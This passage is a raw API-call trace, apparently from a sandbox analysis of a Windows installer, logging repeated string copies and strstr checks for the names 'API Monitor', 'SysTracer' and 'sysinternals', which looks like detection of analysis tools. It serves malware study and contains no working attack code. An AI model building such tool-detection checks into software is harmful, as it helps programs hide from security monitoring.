lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.579] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.579] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.579] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.579] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.579] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.579] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.579] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.579] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.579] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.579] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.579] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.580] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.580] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.580] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.580] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.580] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.580] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.580] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.580] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.580] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.581] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrlenA (lpString="0") returned 1 [0158.581] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrlenA (lpString="0") returned 1 [0158.581] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrlenA (lpString="") returned 0 [0158.581] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.581] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrlenA (lpString="3399936") returned 7 [0158.581] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.581] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.582] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.582] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.582] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrlenA (lpString="") returned 0 [0158.582] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrlenA (lpString="") returned 0 [0158.582] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrlenA (lpString="") returned 0 [0158.582] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.582] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.582] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.582] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.582] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.583] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.583] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.583] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.583] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.583] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.583] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.583] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.583] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.583] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.583] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.583] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.584] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.584] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.584] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.584] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.584] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.584] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.584] lstrlenA (lpString="0") returned 1 [0158.584] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.584] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.584] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.584] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.584] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.584] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.585] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.585] lstrlenA (lpString="0") returned 1 [0158.585] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.585] lstrlenA (lpString="") returned 0 [0158.585] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.585] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.585] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.585] lstrlenA (lpString="3399936") returned 7 [0158.585] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.585] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.585] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.585] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.585] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.585] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.585] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.585] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.585] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrlenA (lpString="") returned 0 [0158.586] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrlenA (lpString="") returned 0 [0158.586] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrlenA (lpString="") returned 0 [0158.586] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.586] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.586] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.587] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.587] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.587] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.587] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.587] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.587] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.587] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.587] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.587] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.587] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.587] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.587] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.588] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.588] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.588] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.588] lstrlenA (lpString="0") returned 1 [0158.588] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.588] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.588] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.588] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.589] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.589] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.589] lstrlenA (lpString="0") returned 1 [0158.589] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.589] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.589] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.589] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.589] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.589] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.589] lstrlenA (lpString="3399936") returned 7 [0158.589] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.589] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.589] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.590] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.590] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.590] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.590] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.590] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.590] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.590] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65698") returned 5 [0158.590] lstrcpyA (in: lpString1=0x430400, lpString2="65698" | out: lpString1="65698") returned="65698" [0158.590] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcpynA (in: 